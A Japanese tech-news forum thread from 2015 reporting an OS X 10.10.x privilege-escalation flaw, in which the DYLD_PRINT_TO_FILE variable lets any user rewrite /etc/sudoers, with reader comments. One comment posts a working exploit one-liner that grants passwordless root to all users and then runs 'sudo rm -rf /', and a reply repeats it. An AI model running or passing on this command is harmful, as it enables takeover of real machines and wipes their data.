パスワードを忘れた? アカウント作成
12286834 story
MacOSX

OS X 10.10.xに権限昇格の脆弱性、sudoersファイルを任意のユーザーが書き換え可能 44

ストーリー by hylom
これはひどい 部門より

OS X 10.10.xで権限昇格を行える脆弱性が発見された。ダイナミックリンカ「dyld」および環境変数「DYLD_PRINT_TO_FILE」の設定を悪用することで、任意のファイルをオープンしたり、任意の場所にファイルを作成して書き込みができてしまうという(ZDNet Japan)。

The Hacker Newsにこれを悪用した操作の例が紹介されているが、たとえば/etc/sudoersファイルを改ざんして一般ユーザーにroot権限を与えることを許す、といったことができるようだ。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • Macは安全です (スコア:1, すばらしい洞察)

    by Anonymous Coward on 2015年07月24日 16時11分 (#2852648)

    アンチウィルスソフトが必要でノロノロのWindowsと違って、Macはいつでも安全でスマートです

    • Re:Macは安全です (スコア:5, おもしろおかしい)

      by Anonymous Coward on 2015年07月24日 16時48分 (#2852671)

      おっしゃるとおりです。
       
      > ダイナミックリンカ「dyld」および環境変数「DYLD_PRINT_TO_FILE」の設定を悪用することで
       
      悪用しなけりゃいいじゃないですか。
      包丁を悪用したら人を殺せるからなんだって話ですよね。
       
      こういう悪質なFUDタレコミを取り上げるのはやめていただきたいです。
      なによりAppleとそのユーザに対して失礼ですよ。

      親コメント
      • by Anonymous Coward

        包丁で人を殺すこととか、コンピュータウィルスを作ることしか頭に無いような悪人に言ってやってくださいな。

        権限昇格というのは、別に、凝った自爆の仕方を見つけたった、というだけではないですよ。
        ユーザがうっかりウィルスの実行ファイルを実行してしまったときの被害が超拡大しまっせ、という話ですよ。

        まあ、そんなふうにウィルスを実行しちゃうのも自爆の内だけど、最近のウィルスのトレンドはその辺なので。

      • by Anonymous Coward

        さすが宗教#2852671が
        ネタなのかマジなのか区別がつかん

        • by Anonymous Coward

          #2852648の自作自演だろ。
          ヒマな人生送ってる奴ってうらやましいな。

          • by Anonymous Coward on 2015年07月25日 14時15分 (#2853092)

            > ヒマな人生送ってる奴ってうらやましいな。
             
            安心してください。
            スラド見に来てるあなたも、十分にヒマな人生を送ってますよ。

            親コメント
    • by Anonymous Coward

      信じないからウイルスに感染するんですよ!

      • by Anonymous Coward

        面白くもないネタをいつまでも続けるのは、痴呆の前段階だよお爺ちゃん。

        • by Anonymous Coward

          面白いかどうかは人それぞれ。

        • by Anonymous Coward

          ネタにマジレスしちゃう人は半年のみならず一生ROMっててくださいね。

    • by Anonymous Coward

      安全じゃないですよ。

    • by Anonymous Coward

      Windowsって毎月大量の不具合見つかってパッチ配ってるのに全然改善してないしね

  • by StandardIO (47182) on 2015年07月25日 13時42分 (#2853074) 日記

    "rootpipe"脆弱性がまだ対応されてないバージョンが沢山あるんだけどね。
    Macの脆弱性は金にならないからまだまだ未発表の脆弱性があるんじゃないかな。
    まだSafariからリモートでできるとかじゃないのでましなのでは。
    あとはiCloudとBonjourを破ればどこの誰のでも完全に乗っ取り放題か...
    あーMacはなんて安全なんだろう。

  • by Anonymous Coward on 2015年07月24日 18時58分 (#2852779)

    Linux や Windows に比べてこの程度で済んでいるのは大したものだ。

    • by Anonymous Coward

      ほんと致命傷で済んで良かった。

    • by Anonymous Coward

      ほんと即死で済んで良かった。苦しむ間もなかっただろう。

  • by Anonymous Coward on 2015年07月24日 20時50分 (#2852830)

    近年のAppleはますますおかしくなってきていないかな?そろそろ足下を見直す時期に来ているのでは。

  • by Anonymous Coward on 2015年07月24日 23時25分 (#2852899)

    これって普段から管理者権限のあるユーザーで使っている自分には関係ない?
    そんな脆弱性使わなくても、sudo使えるし

    Mac OS Xをサーバーとして使っていて、sshなどで入れるようにしてた場合は問題だよね。

    もしくは、1台のMacを複数の人で使いまわししてた時?
    直接ハード触れる場合は、もっと別の問題があるような気がするけどwww

    • by ogino (1668) on 2015年07月25日 0時56分 (#2852919) 日記

      これって普段から管理者権限のあるユーザーで使っている自分には関係ない?
      そんな脆弱性使わなくても、sudo使えるし

      多分勘違いしていると思われます。sudo はユーザのパスワードを確認してから管理者 (root) 権限を得るためのコマンドです。もしあなたが普段から管理者 (root) 権限を使用しているなら、そもそも sudo を使用する必要はありません。

      しかし、もし /etc/sudoers 中の

      # Same thing without a password
      # %wheel        ALL=(ALL) NOPASSWD: ALL

      のコメントアウトを外しているなどしているなら、パスワードの確認なしに root 権限が得られるのでこの限りではありませんが。

      親コメント
      • by Anonymous Coward

        え?Macで管理者権限をつけると、wheelユーザーと同じように、sudoでパスワード聞かれますよ。
        もちろん、アプリのインストールでもパスワード聞かれるし
        Linuxのrootのようなものではないです(そしたら危ないよ)そこはWindowsみたいに危なくないwww

        Macの管理者って権限のないフォルダーにはアクセスできないから(sudo使えばできちゃうけど)
        wheelグループに入ったユーザーって意味に近いものかと。

        • by Anonymous Coward on 2015年07月26日 1時23分 (#2853325)

          管理者=rootと思っているかどうかで話が食い違っている気がする。WindowsもBuiltin AdministratorはUAC承認不要だけど管理者権限を持ったユーザーがUAC承認不要なわけではないし。

          親コメント
  • by Anonymous Coward on 2015年07月25日 1時10分 (#2852923)

    echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo rm -rf /

    • Re:わんらいなー (スコア:4, すばらしい洞察)

      by Anonymous Coward on 2015年07月25日 12時41分 (#2853048)
      見せたいのはいいけど、

      rm -rf /

      以外にしろよ。
      親コメント
    • by Anonymous Coward

      $ echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo pwd
      Traceback (most recent call last):
          File "", line 1, in
      OSError: [Errno 9] Bad file descriptor
      Password:

      ならこの脆弱性なし?

  • by Anonymous Coward on 2015年07月26日 15時44分 (#2853478)

    これ、アクセス権を持たせた方がいいんじゃないの?
    やると、影響範囲がでかいなぁ。。

typodupeerror

※ただしPHPを除く -- あるAdmin

読み込み中...